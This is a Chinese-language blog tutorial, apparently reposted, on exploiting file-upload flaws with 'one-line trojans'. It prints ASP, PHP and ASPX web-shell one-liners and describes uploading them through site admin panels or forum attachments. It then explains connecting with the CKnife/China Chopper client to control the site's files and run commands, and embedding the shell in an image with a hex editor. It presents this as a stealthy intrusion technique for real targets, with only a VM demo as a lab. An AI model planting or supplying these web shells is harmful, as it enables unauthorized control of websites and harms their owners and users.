上传漏洞-一句话木马
聲明:為什么又寫一篇關于一句話木馬,對,我第一次沒寫明白,直寫了一句話木馬的簡單制作,但是還是有很多同學真的看不懂,所以我今天改一下,這次精寫!
上傳漏洞-一句話木馬
講述內容:
- 一句話木馬 木馬使用技巧
- (中國菜刀、C32、CKnife)
簡介:
- 一句話木馬
一句話木馬短小精悍,而且功能強大,隱蔽性非常好,在入侵中始終扮演著強大的作用
往目標網站中加入一句話木馬,然后你就可以在本地通過中國菜刀chopper.exe即可獲取和控制整個網站目錄并可執行一些web賬號所有權限的系統命令,進入后滲透階段。但是發現百度上找到的菜刀都有后門,而且找了很久都沒有找到可以用的菜刀,所以推薦兩款更好的kali下的工具:webacoo、Weevely 和windows下的工具:CKnife java版本的中國菜刀。
接下來我將演示CKnife java版本的中國菜刀的使用方法,并進行講解
本程序需要設置 JAVA運行環境
jdk32位 下載 http://www.uzzf.com/soft/395.html
jdk64位 下載 http://www.uzzf.com/soft/77216.html
CKnife java版本菜刀 下載 http://pan.baidu.com/s/1boyQTXH
使用
1.下載菜刀,打開Cknife.jar軟件,選擇用java打開
2.在上傳一句話漏洞時,我們有兩個方法
<1.已經有了網站后臺的登錄密碼以及賬號,登錄網站后臺后上傳一句話木馬文件>
<2.在一些網站如論壇等等用戶可以上傳附件>//這種方法成功率不高,很多網站對附件有限制
在這里我用虛擬機搭一個靶機,模擬網站服務器.
靶機IP地址為:192.168.138.131
3.模擬上傳木馬文件步驟到服務器
寫法——
Asp一句話:<%eval request(“xxx”)%>
Php 一句話:<%php @eval($_POST[xxx]);?>
Aspx一句話:<%@ Page Languag=”xxx”%><%eval(Request.Item[“xxx”])%>
(然后保存為相應的文件格式并上傳)//xxx是連接的密碼,必須記住,重命名時不能有中文
4.找到我們上傳木馬的地址
如果是在真正的實戰中我們怎么得到木馬的地址呢??
我們可以在前端找到我們上傳的附件,然后右擊審查屬性,就可以看到附件的地址。也可以在網站后臺找到附件存儲的位置
5.打開Cknife.jar軟件
右鍵點擊添加,輸入上傳的php文件地址,php文件密碼,腳本類型選擇PHP,字符編碼GB2312,點擊添加
6.右鍵文件管理就可以了
除了文件上傳還有圖片上傳,把一句話漏洞加載到圖片里面,通過文件上傳的方式上傳一句話木馬//圖片連接性不高,需要iis的解析漏洞,這個漏洞是很久以前的了,所以連接性不高
工具:C32反翻譯軟件
步驟:打開C32反翻譯軟件→將圖片拖入軟件里面(16進制模式)→在右面代碼最下端寫入一句話代碼→另存為(后綴改為圖片原本的后綴)
寫代碼是熱愛,寫到世界充滿愛!
總結
以上是生活随笔為你收集整理的上传漏洞-一句话木马的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Axure 激活码
- 下一篇: [转载]Visual Studio 20